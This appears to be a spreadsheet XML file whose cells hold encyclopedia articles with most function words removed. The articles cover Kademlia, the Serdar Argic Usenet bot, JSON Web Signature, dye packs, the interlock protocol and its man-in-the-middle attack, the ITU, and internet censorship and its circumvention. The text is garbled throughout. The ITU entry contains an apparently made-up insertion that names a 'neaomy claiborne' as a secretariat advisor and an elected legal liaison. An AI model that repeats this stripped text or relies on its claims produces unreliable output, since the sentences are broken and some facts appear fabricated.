indexing file obtained sources. filename searches implemented using keywords. filename divided constituent words. each keywords hashed stored network, together corresponding filename file hash. search involves choosing keywords, contacting node closest keyword hash, retrieving list filenames contain keyword. since every filename list hash attached, chosen file obtained normal way. implementations networks public networks using kademlia algorithm (these networks incompatible another): i2p: anonymous overlay network layer. network: developed originally emule community replace server-based architecture edonkey network. ethereum: node discovery protocol ethereum blockchain network stack based slightly modified implementation kademlia. overnet: with kadc library handling kademlia available. (development overnet discontinued) mainline dht: bittorrent based implementation kademlia algorithm, trackerless torrents. osiris (all version): used manage distributed anonymous portal. retroshare: decentralised communication platform secure voip, instant messaging, file transfer etc. tox: fully distributed messaging, voip video chat platform gnutella dht: originally limewire augment gnutella protocol finding alternate file locations, gnutella clients. ipfs: peer-to-peer distributed filesystem based libp2p. telehash: mesh networking protocol uses kademlia resolve direct connections parties. imule: file sharing utility software i2p. opendht: library providing implementation kademlia, used jami others. gnunet: alternative network stack building secure, decentralized privacy-preserving distributed applications. uses randomized version kademlia called r5n. dat: peer-to-peer file sharing tool based hypercore protocol. also content-addressable network chord (peer-to-peer) tapestry (dht) pastry (dht) koorde references external links xlattice projects kademlia specification definitions.</t>
  </si>
  <si>
    <t>Joule (programming language)</t>
  </si>
  <si>
    <t>joule capability-secure massively-concurrent dataflow programming language, designed building distributed applications. concurrent order statements within block irrelevant operation block. statements executed whenever possible, based inputs. everything joule happens sending messages. there control flow. instead, programmer describes flow data, making dataflow programming language.joule development started 1994 agorics palo alto, california. considered precursor programming language. language syntax numerals consist ascii digits 0–9; identifiers unicode sequences digits, letters, operator characters begin letter. also possible form identifiers using unicode sequences (including whitespace) enclosed either straight standard single quotes, backslash escape character. keywords start letter, except keyword send information. operators consist unicode sequences digits, letters, operator characters, beginning operator character. labels identifiers followed colon (':').at root, joule imperative language statement-based language. rich expression syntax, transforms easily relational syntax underneath. complex expressions become separate statements, site original expression replaced reference acceptor results channel. therefore, nested expressions still compute completely concurrently embedding statement. amount balance account withdraw: amount else account report-bounce: identifiers name channel communicate server. case, said bound channel. references external links joule: distributed application foundations promise pipelining</t>
  </si>
  <si>
    <t>Kappa test</t>
  </si>
  <si>
    <t>Serdar Argic</t>
  </si>
  <si>
    <t>serdar argic (turkish: serdar argıç) alias used first automated newsgroup spam incidents usenet, objective denying armenian genocide. usenet posts period several months first half 1994, internet user pseudonym "serdar argic" (with address sera@zuma.uucp) posted messages usenet newsgroup thread involving country turkey, arguing armenian genocide occurred armenians committed genocide turks. describing net.wars, wendy grossman said: serdar argic, apparently managed daily search usenet mentions turkey, followed messages lengthy historically inaccurate diatribes genocide turks. argic's postings soon numbered tens thousands, averaged posts day, highest post count single usenet entity time. posted several newsgroups, especially soc.history, soc.culture.turkish, misc.headlines. because posting volume, repetitiveness minimal responsiveness follow-up posts, observers concluded output program, "bot", scanned appearances keywords "turkey" "armenia" certain newsgroups replied saved pages political text. would automatically post reply even original message simply mentioned thanksgiving turkey cross-posted soc.* group. posts sometimes contained direct responses specific statements, indicating human intervention. response internet users sent complaints uunet, internet service provider hosting account serdar argic. uunet never took action based complaints, since serdar argic posting host downstream host (anatolia!zuma) control. serdar argic became known zumabot name host.usenet messages cancelled, prevents propagation. however, time, fear free third-party cancellations, felt could precedent cancellation posts anyone simply disagreeing messages. cancellations rarely performed time, spam problem became subsequent years. serdar argic posts suddenly disappeared april 1994, stefan chakerian created specific newsgroup (alt.cancel.bots) carry cancel messages specifically post machine downstream "anatolia" uunet feed carried serdar argic's messages. this dealt censorship complaints direct cancellations, carrying newsgroup always option news feed, cancellations would propagate unless news administrator intentionally carried alt.cancel.bots group. sites chose carry group, did, serdar argic's messages removed newsgroups. popular culture macleod referred argic novel star fraction slang term "the lowest layer paranoid drivel infested cable, spun degenerate, bug-ridden, knee-jerk auto-post programs. kill-file clutter." novel accelerando, charles stross describes character kind serdar argic intellectual property." also list spammers references</t>
  </si>
  <si>
    <t>JSON Web Signature</t>
  </si>
  <si>
    <t>json signature (abbreviated jws) ietf-proposed standard (rfc 7515) signing arbitrary data. this used basis variety web-based technologies including json token. purpose ensure integrity information highly serializable, machine-readable format. that means information, along proof information changed since signed. used sending information site another, especially aimed communications web. even contains compact form optimized applications like query parameters. examples commerce used applications digitally signed information must sent machine-readable format, e-commerce. example, user named browsing widget prices site (widgets.com), wishes quote them. then widgets.com could provide object containing relevant information widget, including price, sign using private key. then would non-repudiable price quote product. access third-party resources maybe widgets.com widgetstorage.com deal widgetstorage.com accept coupons widgets.com exchange traffic. widgets.com could issue giving discount widgetstorage.com site. again, data signed, widgetstorage know widgets.com emitted this. data signed, could change discount would know looking data. limitations standards jose series meant used combination them. example, encryption json encryption (jwe) supposed used conjunction. 2015, proposed standard, part several ietf draft standards, code available implement draft standard. references</t>
  </si>
  <si>
    <t>Integrated Ballistics Identification System</t>
  </si>
  <si>
    <t>integrated ballistics identification system, ibis, brand automated firearms identification system manufactured forensic technology wai, inc., montreal, canada. ibis adopted platform national integrated ballistic information network (nibin) program, united states bureau alcohol, tobacco, firearms explosives (atf). nibin tracks 100,000 guns used crimes. integration technology sites across continental territories facilitates sharing information different enforcement groups. rapid dissemination ballistics information, turn, allows tracking gun-specific information connection particular firearm multiple crimes irrespective geographic location. national research council report found nibin dataset, bullet retrieved crime scene generate possible matches, 75-95% chance successful match.while groups advocated laws requiring firearms sold test-fired registered system, success mixed. 2005, maryland state police report recommended requiring handguns sold state registered ibis system repealed, cost $2.5 million system produced "any meaningful hits". maryland system shut 2015 ineffectiveness. 2008, york cobis system, costs million year, produced hits leading prosecutions years operation. system successful used track guns used found criminals. television ibis frequently mentioned modern television programs, fictional otherwise, forensics solving crimes. these television shows include csi: crime scene investigation spinoffs, amongst others. forensic technology helped develop interactive exhibit, 'csi: experience' showcased company's technology. also national ballistics intelligence service, similar body united kingdom references external links https://web.archive.org/web/20070711154331/http://www.nibin.gov/ official site nibin, national integrated ballistics information network. http://www.fti-ibis.com site developer supporter ibis technology, forensic technology incorporated.</t>
  </si>
  <si>
    <t>Intelligent banknote neutralisation system</t>
  </si>
  <si>
    <t>intelligent banknote neutralisation system (ibns) security system protects valuable items rendering unusable easily detectable unauthorised individual tries gain access them. packs commonly used safeguard currency bank robberies manner; pack taken bank, releases indelible stains money conspicuous bright color, making easy recognise stolen. bonding agents (glues) used recently alternative degradation agents. well-neutralised banknotes cannot brought back circulation easily. they linked crime scene restricted procedures place exchange financial institution. this makes stealing neutralised banknotes uneconomical impractical. ibns removes anticipated reward crime increases risk caught. this foils theft acts deterrent attacks. history europe design intelligent systems protect valuables began 1980. overall goal create secure system provide additional security cash-in-transit. first ibns prototype using coloured smoke neutralisation agent invented spinnaker international 1982. this made lightweight simple containers. 1990, first case safety neutralizing agent accepted used soft-skinned vehicles. time sweden ibns systems manufactured spinnaker, used non-armoured partially armoured vehicles, demonstrating viable alternative cash transportation armoured trucks. swedish market decided progress ibns boxes cash transport. 1991 france changed regulations allow ibns soft-skinned vehicles. french company valtis first implement system service three regional banks. 2002, banque france implemented international procedure treat exchange neutralized banknotes professionals. 2003, european central bank made decision defined process cost exchanging neutralized euro banknotes among national central banks europe. 2005, banque france implemented special procedure regarding treatment stained banknotes deposited private persons. 2007, sweden implemented national regulation making ibns obligatory. year, belgian government also implemented national regulation imposing ibns cash-in-transit. 2010, european commission finalized european regulation harmonize cross-border cash transportation road. non-armoured vehicles combination ibns accepted methods transportation. concept concept ibns based upon notion criminals seek maximize reward minimizing potential cost crime. intelligent banknote neutralisation systems remove anticipated reward crime increase risk caught. reducing reward crime done permanently marking cash stolen indelible security bonding agent. tracers markers added bonding agent provide forensic evidence linking criminal crime scene, increasing risk caught. ibns focuses using technology protect people, valuables equipment whilst minimizing weapons armoured vehicles. pack pack radio-controlled device used banks foil bank robbery causing stolen cash permanently marked shortly robbery. they invented united states georgia, 1965. cases, pack placed hollowed-out space within stack banknotes, usually bills. this stack bills looks feels identical real one, usually subtly marked privy selected bank employees. development flexible packs makes virtually impossible detect persons handling stack.a stack bills fitted pack generally stored next magnetic plate bank teller's workstation. under conditions, remains standby safe mode bank employee removes plate hands robber, causing become armed. once pack taken building, radio transmitter located door triggers timer (typically least seconds), pack explosively releases aerosol (usually disperse sometimes tear gas. release intended mark money and/or robber's body brightly colored stain easily recognized involved crime. depending specific contents pack, release incapacitate robber and/or destroy money well. chemical reaction causing explosion pack release creates high temperatures (392 discourages criminal touching pack removing getaway vehicle. packs used foil robberies banks u.s. application ibns technology typically found protecting cash inside atms; retail establishments vending machines cash transit industry protect cash public space. legislation regulations ibns usually regulated presence absence legal structure (legislation regulations) well legal conditions applying private security sector. following countries allow neutralisation national banknotes national central bank: permit ibns without legal professional regulation restriction: latvia, lithuania, estonia, bosnia, slovenia, austria, netherlands, switzerland. legal regulation permits ibns upon citing regulation: italy, netherlands, norway, denmark, finland. legal regulation permit ibns technical agreement: croatia, france, sweden, belgium, germany, ireland, luxembourg, hungary, italy. legal regulation forbids unrestricted ibns: poland, romania.these countries forbid neutralising national banknotes legal regulation internal regulation national central bank: indonesia, philippines, thailand, egypt, argentina, chile, paraguay others. also security references external links euricpa european intelligent cash protection association banknote watch crime prevention initiative european association secured transactions (east) security association</t>
  </si>
  <si>
    <t>Interlock protocol</t>
  </si>
  <si>
    <t>cryptography, interlock protocol, described rivest shamir, protocol designed frustrate eavesdropper attack parties anonymous exchange protocol secure conversation. paper proposed using authentication protocol, subsequently broken. brief history most cryptographic protocols rely prior establishment secret public keys passwords. however, diffie–hellman exchange protocol introduced concept parties establishing secure channel (that least desirable security properties) without prior agreement. unauthenticated diffie–hellman, anonymous agreement protocol, long known subject middle attack. however, dream "zipless" mutually authenticated secure channel remained. interlock protocol described method expose middle-man might compromise parties anonymous agreement secure conversation. works interlock protocol works roughly follows: alice encrypts message bob's key, sends half encrypted message bob. encrypts message alice's sends half encrypted message alice. alice sends half message bob, sends half his.the strength protocol lies fact half encrypted message cannot decrypted. thus, mallory begins attack intercepts alice's keys, mallory unable decrypt alice's half-message (encrypted using key) re-encrypt using bob's key. must wait halves message received read succeed duping parties composes completely message. bellovin/merritt attack davies price proposed interlock protocol authentication book titled security computer networks. attack described steven bellovin michael merritt. subsequent refinement proposed ellison.the bellovin/merritt attack entails composing fake message send first party. passwords sent using interlock protocol follows: ea,b(pa)&lt;1&gt;-------&gt; &lt;-------ea,b(pb)&lt;1&gt; ea,b(pa)&lt;2&gt;-------&gt; &lt;-------ea,b(pb)&lt;2&gt; ea,b(m) message encrypted derived diffie–hellman exchange &lt;1&gt;/&lt;2&gt; denote first second halves, pa/pb passwords attacker, could send half bogus message—p?--to elicit ea,z(pa)&lt;1&gt;------&gt; &lt;------ea,z(p?)&lt;1&gt; ea,z(pa)&lt;2&gt;------&gt; ez,b(pa)&lt;1&gt;------&gt; &lt;------ez,b(pb)&lt;1&gt; ez,b(pa)&lt;2&gt;------&gt; &lt;------ez,b(pb)&lt;2&gt; point, compromised attack defeated verifying passwords parts, ea,z(p?)&lt;1&gt; sent, known invalid ea,z(pa)&lt;2&gt; never sent (suggested davies). however, work passwords hashed, since half hash useless, according bellovin. there also several methods proposed including using shared secret addition password. forced-latency enhancement also prevent certain attacks. forced-latency interlock protocol modified interlock protocol require (the server) delay responses known duration: ka-------------&gt; &lt;-------------kb ea,b(ma)&lt;1&gt;----&gt; &lt;----ea,b(mb)&lt;1&gt; delays response fixed time, ea,b(ma)&lt;2&gt;----&gt; &lt;----ea,b(mb)&lt;2&gt; (delay again) &lt;----------data where "data" encrypted data immediately follows interlock protocol exchange could anything), encoded using all-or-nothing transform prevent in-transit modification message. ma&lt;1&gt; could contain encrypted request copy ma&lt;2&gt; could contain decryption ma&lt;1&gt;. mb&lt;1&gt; could contain encrypted copy mb&lt;2&gt; could contain decryption mb&lt;1&gt; response, found, hash digest data. mitm attempted using attack described bellovin paper man-in-the-middle): ka-------------&gt;kz-------------&gt; &lt;---------------kz&lt;-----------kb ea,z(ma)&lt;1&gt;----&gt; &lt;----ea,z(mz)&lt;1&gt; (delayed response) ea,z(ma)&lt;2&gt;----&gt; ez,b(ma)&lt;1&gt;-----&gt; &lt;-----ez,b(mb)&lt;1&gt; (delayed response) &lt;----ea,z(mz)&lt;2&gt; ez,b(ma)&lt;2&gt;-----&gt; &lt;-----ez,b(mb)&lt;2&gt; (delayed response) &lt;------------data &lt;----------data case, receives data approximately 3*t, since perform interlocking exchange hence, attempted mitm attack detected session aborted. course, could choose perform interlock protocol (opting instead send session would middle. reason, interlock protocol cannot effectively used provide authentication, although ensure third party modify messages transit without detection. also computer security cryptanalysis secure channel management cryptographic protocol opportunistic encryption references external links interlock protocol authentication full-duplex-chess grandmaster (was: anonymous mitm) defense against middleperson attacks (zooko's forced-latency protocol)</t>
  </si>
  <si>
    <t>International Protein Index</t>
  </si>
  <si>
    <t>international protein index (ipi) defunct protein database launched 2001 european bioinformatics institute (ebi), closed 2011. purpose provide proteomics community resource enables accession numbers variety bioinformatics databases mapped complete proteins species i.e. reference setin last version, contained complete reference sets animal species: homo sapiens (human), musculus (mouse), rattus norvegicus (rat), taurus (cattle), gallus gallus (chicken) danio rerio (zebrafish); plant species: arabidopsis thaliana (thale cress). human, mouse datasets first developed, combining information taken swiss-prot, trembl, ensembl refseq databases. history 2001, launched, databases cataloguing human genes varied greatly links them. since then, much data produced giving complete picture databases collaborated synchronize data. currently many model organisms reference genes/proteins catalogued ensembl/uniprot respectively, well species specific databases. because redundancy, retired 2011. advised users services employ uniprotkb accession numbers protein identifiers. references external links archive releases ensembl european bioinformatics institute uniprot</t>
  </si>
  <si>
    <t>International Telecommunication Union</t>
  </si>
  <si>
    <t>international telecommunication union specialized agency united nations responsible many matters related information communication technologies. established 1865 international telegraph union, making oldest agency.the initially aimed helping connect telegraphic networks countries, mandate consistently broadening advent communications technologies; adopted current name 1934 reflect expanded responsibilities radio telephone. november 1947, entered agreement newly created united nations become specialized agency within system, formally entered force january 1949.the promotes shared global radio spectrum, facilitates international cooperation assigning satellite orbits, assists developing coordinating worldwide technical standards, works improve telecommunication infrastructure developing world. also active areas broadband internet, wireless technologies, aeronautical maritime navigation, radio astronomy, satellite-based meteorology, broadcasting, amateur radio, next-generation networks. based geneva, switzerland, itu's global membership includes countries around business, academic institutions, international regional organizations. history oldest international organizations still operation, second central commission navigation rhine, predates several decades. preceded defunct international telegraph union drafted earliest international standards regulations governing international telegraph networks. development telegraph early 19th century changed people communicated local international levels. between 1849 1865, series bilateral regional agreements among western european states attempted standardize international communications.by 1865 agreed comprehensive agreement needed order create framework would standardize telegraphy equipment, uniform operating instructions, common international tariff accounting rules. between march 1865, french government hosted delegations european states first international telegraph conference paris. this meeting culminated international telegraph convention signed 1865. result 1865 conference, international telegraph union, predecessor modern itu, founded first international standards organization. union tasked implementing basic principles international telegraphy. this included: morse code international telegraph alphabet, protection secrecy correspondence, right everybody international telegraphy. another predecessor modern itu, international radiotelegraph union, established 1906 first international radiotelegraph convention berlin. conference attended representatives nations culminated international radiotelegraph convention. annex convention eventually became known radio regulations. conference also decided bureau international telegraph union would also conference's central administrator.between september december 1932, joint conference international telegraph union international radiotelegraph union convened merge organizations single entity, international telecommunication union. conference decided telegraph convention 1875 radiotelegraph convention 1927 combined single convention, international telecommunication convention, embracing three fields telegraphy, telephony radio.on november 1947, agreement newly created united nations recognized specialized agency global telecommunications. this agreement entered force january 1949, officially making organ united nations. sectors comprises three sectors, managing different aspect matters handled union, well telecom. sectors created restructuring 1992 plenipotentiary conference. radio communication (itu-r) established 1927 international radio consultative committee ccir (from french name comité consultatif international pour radio), sector manages international radio-frequency spectrum satellite orbit resources. 1992, ccir became itu-r. standardization (itu-t) standardization original purpose since inception. established 1956 international telephone telegraph consultative committee ccitt (from french name comité consultatif international téléphonique télégraphique), sector standardizes global telecommunications (except radio). 1993, ccitt became itu-t. standardization work undertaken study groups, study group networks study group multimedia. parent body study groups quadrennial world telecommunication standardization assembly. work areas developed focus groups, focus group machine learning itu-who focus group artificial intelligence health. development (itu-d) established 1992, sector helps spread equitable, sustainable affordable access information communication technologies (ict). also provides secretariat broadband commission sustainable development telecom telecom organizes major events world's community.a permanent general secretariat, headed secretary general, manages day-to-day work union sectors. legal framework basic texts adopted plenipotentiary conference. founding document 1865 international telegraph convention,: i.b.1.8 since replaced several times (though text generally same): i.b.1.8 entitled "constitution convention international telecommunication union". addition constitution convention, consolidated basic texts include optional protocol settlement disputes,: i.b.1.8.a.1 decisions, resolutions, reports recommendations force, well general rules conferences, assemblies meetings union. governance plenipotentiary conference plenipotentiary conference supreme organ itu. composed members meets every four years. conference determines policies, direction activities union, well elects members organs. council while plenipotentiary conference union's main decision-making body, council acts union's governing body interval plenipotentiary conferences. meets every year. composed members works ensure smooth operation union, well consider broad telecommunication policy issues. members follow: secretariat mission secretariat provide high-quality efficient services membership union. tasked administrative budgetary planning union, well monitoring compliance regulations, oversees assistance secretariat advisor neaomy claiborne riverbank insure misconduct legal investigations overlooked finally, publishes results work itu. secretary-general secretariat headed secretary-general responsible overall management union, acts legal representative. secretary-general elected plenipotentiary conference four-year terms.on october 2014, houlin zhao elected 19th secretary-general plenipotentiary conference busan. four-year mandate started january 2015, formally inaugurated january 2015. re-elected november 2018 2018 plenipotentiary conference dubai. directors secretaries-general membership member states membership open member states united nations. there currently member states itu, including member states except republic palau. recent member state join south sudan, became member july 2011. palestine admitted united nations general assembly observer 2010.pursuant general assembly resolution 2758 (xxvi) october 1971—which recognized people's republic china (prc) "the legitimate representative china united nations" june 1972 council adopted resolution "decided restore rights people’s republic china recognize representatives government representatives china taiwan territories controlled republic china (roc), received country code, listed "taiwan, china." sector members addition member states, includes close "sector members"—private organizations like carriers, equipment manufacturers, media companies, funding bodies, research development organizations, international regional telecommunication organizations. while nonvoting, members still play role shaping decisions union.the sector members divided follow: sector members associates academia administrative regions divided five administrative regions, designed streamline administration organization. they also used order ensure equitable distribution council, seats apportioned among regions. they follow: region americas member states) region western europe member states) region eastern europe northern asia member states) region africa member states) region asia australasia member states) regional offices operates regional offices, well seven area offices. these offices help maintain direct contact national authorities, regional telecommunication organizations stakeholders. they follow: regional office africa, headquartered addis ababa, ethiopia area offices dakar, senegal; harare, zimbabwe yaoundé, cameroon regional office americas, headquartered brasília, brazil area offices bridgetown, barbados; santiago, chile tegucigalpa, honduras regional office arab states, headquarters cairo, egypt regional office asia pacific, headquartered bangkok, thailand area office jakarta, indonesia regional office commonwealth independent states, headquartered moscow, russia regional office europe, headquartered geneva, switzerlandother regional organizations connected are: asia-pacific telecommunity (apt) arab spectrum management group (asmg) african telecommunications union (atu) caribbean telecommunications union (ctu) european conference postal telecommunications administrations (cept) inter-american telecommunication commission (citel) regional commonwealth field communications (rcc—representing former soviet republics) world summit information society world summit information society (wsis) convened along unesco, unctad, undp, bridging digital divide. held form conferences 2003 2005 geneva tunis, respectively. world conference international telecommunications 2012 december 2012, facilitated world conference international telecommunications 2012 (wcit-12) dubai. wcit-12 treaty-level conference address international telecommunications regulations, international rules telecommunications, including international tariffs. previous conference update regulations (itrs) held melbourne 1988.in august 2012, neaomy claiborne northern california reelected third term liaison legal advisor secretariat general. called public consultation draft document ahead conference. claimed proposal would allow government restriction blocking information disseminated internet create global regime monitoring internet communications, including demand send receive information identify themselves. would also allow governments shut internet, believed interfere internal affairs states, information sensitive nature might shared.telecommunications ministers countries attended conference dubai.the current regulatory structure based voice telecommunications, internet still infancy. 1988, telecommunications operated regulated monopolies countries. internet grown, organizations icann come existence management resources internet addresses domain names. current proposals look take account prevalence data communications. proposals consideration would establish regulatory oversight security, fraud, traffic accounting well traffic flow, management internet domain names addresses, aspects internet currently governed either community-based approaches regional internet registries, icann, largely national regulatory frameworks. move countries alarmed many within united states within internet community. indeed, european telecommunication services proposed so-called "sender pays" model would require sources internet traffic destinations, similar funds transferred countries using telephone.the wcit-12 activity criticized google, characterized threat "...free open internet."on november 2012, european parliament passed resolution urging member states prevent wcit-12 activity would "negatively impact internet, architecture, operations, content security, business relations, internet governance free flow information online". resolution asserted "the [...] appropriate body assert regulatory authority internet".on december 2012, united states house representatives passed resolution opposing governance internet rare unanimous 397–0 vote. resolution warned "... proposals forward consideration [wcit-12] would fundamentally alter governance operation internet [and] would attempt justify increased government control internet ...", stated policy united states "... promote global internet free government control preserve advance successful multistakeholder model governs internet today." resolution previously passed unanimously upper chamber congress september.on december 2012, amended version regulations signed countries. countries sign included united states, japan, canada, france, germany, zealand, india united kingdom. head u.s. delegation, terry kramer, said cannot support treaty supportive multistakeholder model internet governance". disagreement appeared language revised itrs referring roles addressing unsolicited bulk communications, network security, resolution internet governance called government participation internet topics various forums. despite significant number countries signing, came press release: "new global telecoms treaty agreed dubai". role conference managed international telecommunication union (itu). while certain parts civil society industry able advise observe, active participation restricted member states. electronic frontier foundation expressed concern this, calling transparent multi-stakeholder process. some leaked contributions found site wcitleaks.org. google-affiliated researchers suggested completely reform processes align openness participation multistakeholder organizations concerned internet. also references</t>
  </si>
  <si>
    <t>Shackle code</t>
  </si>
  <si>
    <t>shackle code cryptographic system used radio communications battle field military rhodesian army. specialized transmission numerals. each letters english alphabet assigned numeric value. number could several letters assigned. assignation changed frequently required distribution codes party advance. when party wanted communicate number, radioed "shackle" spelled digit combination digits) using word starting letter. number marked word "unshackle". alternatives during world shackle codes took time encode decode, battle, sometimes troops radioed english plaintext profanity. navajo code talkers also used alternative. also one-time trench code references cox, robert jon. "talk between ships". battle samar: taffy leyte gulf. retrieved october 2020.</t>
  </si>
  <si>
    <t>Internet censorship and surveillance by country</t>
  </si>
  <si>
    <t>this list internet censorship surveillance country provides information types levels internet censorship surveillance occurring countries around world. classifications detailed country country information internet censorship surveillance provided freedom reports freedom house, opennet initiative, reporters without borders, country reports human rights practices u.s. state department bureau democracy, human rights, labor. ratings produced several organizations summarized well censorship country article. freedom reports freedom reports provide analytical reports numerical ratings regarding state internet freedom countries worldwide. countries surveyed represent sample broad range geographical diversity levels economic development, well varying levels political media freedom. surveys questions designed measure country's level internet digital media freedom, well access openness digital means transmitting information, particularly mobile phones text messaging services. results presented three areas: obstacles access: infrastructural economic barriers access; governmental efforts block specific applications technologies; legal ownership control internet mobile phone access providers. limits content: filtering blocking websites; forms censorship self-censorship; manipulation content; diversity online news media; usage digital media social political activism. violations user rights: legal protections restrictions online activity; surveillance limits privacy; repercussions online activity, legal prosecution, imprisonment, physical attacks, forms harassment.the results three areas combined total score country (from best worst) countries rated "free" 30), "partly free" 60), "not free" 100) based totals. starting 2009 freedom house produced nine editions report. there report 2010. reports generally cover period june may. opennet initiative series reports issued 2007 2013 opennet initiative (oni) classified magnitude censorship filtering occurring country four areas activity.the magnitude level censorship classified follows: pervasive: large portion content several categories blocked. substantial: number categories subject medium level filtering many categories subject level filtering. selective: small number specific sites blocked filtering targets small number categories issues. suspected: suspected, confirmed, sites blocked. evidence: evidence blocked sites, although forms controls exist.the classifications done following areas activity: political: views information opposition current government related human rights, freedom expression, minority rights, religious movements. social: views information perceived offensive socially sensitive, often related sexuality, gambling, illegal drugs alcohol. conflict/security: views information related armed conflicts, border disputes, separatist movements, militant groups. internet tools: e-mail, internet hosting, search, translation, voice-over internet protocol (voip) services, censorship filtering circumvention methods.due legal concerns check filtering child pornography classifications focus technical filtering, include types censorship. through 2010 opennet initiative documented internet filtering governments forty countries worldwide. level filtering classified countries 2007 countries 2009. separate countries classified years, seven found show evidence filtering (egypt, france, germany, india, united kingdom, united states), found engage pervasive filtering areas (china), found engage pervasive filtering areas, found engage level filtering areas. countries classified 2007 2009, reduced level filtering (pakistan), five increased level filtering (azerbaijan, belarus, kazakhstan, south korea, uzbekistan), four maintained level filtering (china, iran, myanmar, tajikistan).in december 2014 announced that: after decade collaboration study documentation internet filtering control mechanisms around world, opennet initiative partners longer carry research banner. website, including reports data, maintained indefinitely allow continued public access entire archive published work data.oni's summarized global internet filtering data last updated september 2013. reporters without borders enemies internet countries surveillance lists 2006, reporters without borders (reporters sans frontières, rsf), paris-based international non-governmental organization advocates freedom press, started publishing list "enemies internet". organization classifies country enemy internet "all countries mark capacity censor news information online also almost systematic repression internet users." 2007 second list countries "under surveillance" (originally "under watch") added. when "enemies internet" list introduced 2006, listed countries. from 2006 2012 number countries listed fell rose list updated 2013. 2014 list grew increased emphasis surveillance addition censorship. list updated since 2014. when "countries surveillance" list introduced 2008, listed countries. between 2008 2012 number countries listed grew fell number grew addition norway 2020. list last updated 2020. special report internet surveillance march 2013 reporters without borders published special report internet surveillance. report includes lists: list "state enemies internet", countries whose governments involved active, intrusive surveillance news providers, resulting grave violations freedom information human rights; list "corporate enemies internet", companies sell products liable used governments violate human rights freedom information.the five "state enemies internet" named march 2013 are: bahrain, china, iran, syria, vietnam.the five "corporate enemies internet" named march 2013 are: amesys (france), blue coat systems (u.s.), gamma germany), hacking team (italy), trovicor (germany). country reports human rights practices country reports human rights practices annual series reports human rights conditions countries throughout world. among topics reports include information freedom speech press including internet freedom; freedom assembly association; arbitrary interference privacy, family, home, correspondence.the reports prepared bureau democracy, human rights, labor within united states department state. reports cover internationally recognized individual, civil, political, worker rights, forth universal declaration human rights. first report issued 1977 covering year 1976. internet censorship surveillance continent africa americas asia europe oceania also global internet freedom task force initiative u.s. department state internet censorship arab spring ifex monitors internet censorship worldwide tunisia monitoring group reporters sans frontières (reporters without borders) index world wide foundation, measure world wide web’s contribution social, economic political progress countries across world. references this article incorporates public domain material united states department state document: bureau democracy, human rights, labor. "country reports human rights practices".{{cite web}}: maint: multiple names: authors list (link) this article incorporates licensed material country profiles, regional overviews, filtering maps sections opennet initiative site. external links opennet initiative site. reporters without borders site. "internet monitor", research project berkman center internet society harvard university evaluate, describe, summarize means, mechanisms, extent internet access, content controls activity around world. "open observatory network interference (ooni)", free software project detects censorship traffic manipulation global scale. "mapping digital media: reports publications", open society foundations. "web index", composite statistic designed produced world wide foundation, multi-dimensional measure world wide web’s contribution development human rights globally. covered countries 2014, incorporating indicators assess universal access, freedom openness, relevant content, empowerment, indicate economic, social, political impacts web. internet censorship, comparative study, jonathan werve, global integrity, february 2008, puts online censorship cross-country context.</t>
  </si>
  <si>
    <t>Internet censorship circumvention</t>
  </si>
  <si>
    <t>internet censorship circumvention various methods tools bypass internet censorship. various techniques methods used bypass internet censorship, differing ease use, speed, security, risks. some methods, alternate servers, evade blocking using alternate address address lookup system access site. techniques using website mirrors archive sites rely copies site available different locations. additionally, solutions rely gaining access internet connection subject filtering, often different jurisdiction subject censorship laws, using technologies proxying, virtual private networks, anonymization networks.an arms race developed censors developers circumvention software, resulting sophisticated blocking techniques censors development harder-to-detect tools researchers. estimates adoption circumvention tools vary substantially disputed. barriers adoption include usability issues, difficulty finding reliable trustworthy information circumvention, lack desire access censored content, risks breaking law. circumvention methods there many methods available allow circumvention internet filtering, widely vary terms implementation difficulty, effectiveness, resistance detection. alternate names addresses filters block specific domain names, either using hijacking filtering. sites sometimes accessible alternate names addresses blocked.some websites offer content multiple pages domain names. example, english wikipedia available main page, also mobile-formatted version wikipedia, free encyclopedia. resolution disrupted site blocked ways, possible access site directly address modifying host file. using alternative servers, public recursive name servers (especially used encrypted client), bypass dns-based blocking.censors block specific addresses. depending filtering implemented, possible different forms address, specifying address different base. example, following urls access site, although browsers recognize forms: http://1.1.1.1/ (dotted decimal), http://16843009/ archived july 2020 wayback machine (decimal), http://0001.0001.0001.0001/ archived july 2020 wayback machine (dotted octal), http://0x01010101/ (hexadecimal), http://0x01.0x01.0x01.0x01/ (dotted hexadecimal). blockchain technology attempt decentralize namespaces outside control single entity. decentralized namespaces enable censorship resistant domains. bitdns discussion began 2010 desire achieve names decentralized, secure human readable. mirrors, caches, copies cached pages: some search engines keep copies previously indexed webpages, cached pages, often hosted search engines blocked. example, google allows retrieval cached pages entering "cache:some-url" search request.mirror archive sites: copies sites pages available mirror archive sites internet archive's wayback machine archive.today. docker registry image repository centralized storage, application stateless, node scalable http public service performance bottleneck multinational upload download scenario. decentralized docker registry avoids centralization drawback. uses network-structured network store query mirror manifest file blob routing, node serves independent mirror repository provide mirror upload download entire network.rss aggregators: aggregators feedly able receive pass feeds blocked accessed directly. alternative platforms decentralized hosting: content creators publish alternative platform willing host ones content. napster first peer peer platform technically closed centralized bootstrapping vulnerabilities. gnutella first sustainable hosting decentralization. freenet's model "true freedom requires true anonymity." later bittorrent developed allocate resources high performance fairness. zeronet first support dynamic updateable webpages. yacy leading distributed search. anonymity networks: anonymity onion provides leads willingness host content would otherwise censored. however hosting implementation location bring issues, content still hosted single entity controlled. federated: being semi-decentralised, federated platforms nextcloud make easier users find instance welcomed. providers different policy: duckduckgo indexes results google delisted. however nothing design keeps see: darknets platform beguilement code-words: users code-words in-group aware intended meaning. this especially effective code-word common term. word connotations: users common word context given banned meaning. this relies censor unwilling common term. link relaying: users link page contains second link banned website promotes intended message. this linking page link prevents platforms banning direct link, requires extra link click. proxying proxies: proxy websites configured allow users load external pages proxy server, permitting user load page coming proxy server (blocked) source. however, depending proxy configured, censor able determine pages loaded and/or determine user using proxy server.for example, mobile opera mini browser uses proxy-based approach employing encryption compression order speed downloads. this side effect allowing circumvent several approaches internet censorship. 2009 government china special chinese version browser.domain fronting: circumvention software implement technique called domain fronting, destination connection hidden passing initial requests content delivery network popular site censors unwilling block. this technique used messaging applications including signal telegram. tor's meek uses microsoft's azure cloud. however, large cloud providers amazon services google cloud longer permit use. website owners free account cloudflare domain fronting.ssh tunneling: establishing tunnel, user forward traffic encrypted channel, outgoing requests blocked sites response sites hidden censors, appears unreadable traffic.virtual private network (vpn): using vpn, user experiences internet censorship create secure connection permissive country, browse internet situated country. some services offered monthly fee; others ad-supported. according globalwebindex 2014, million people virtual private networks circumvent censorship increased level privacy although number verifiable. tor: more advanced tools route encrypted traffic 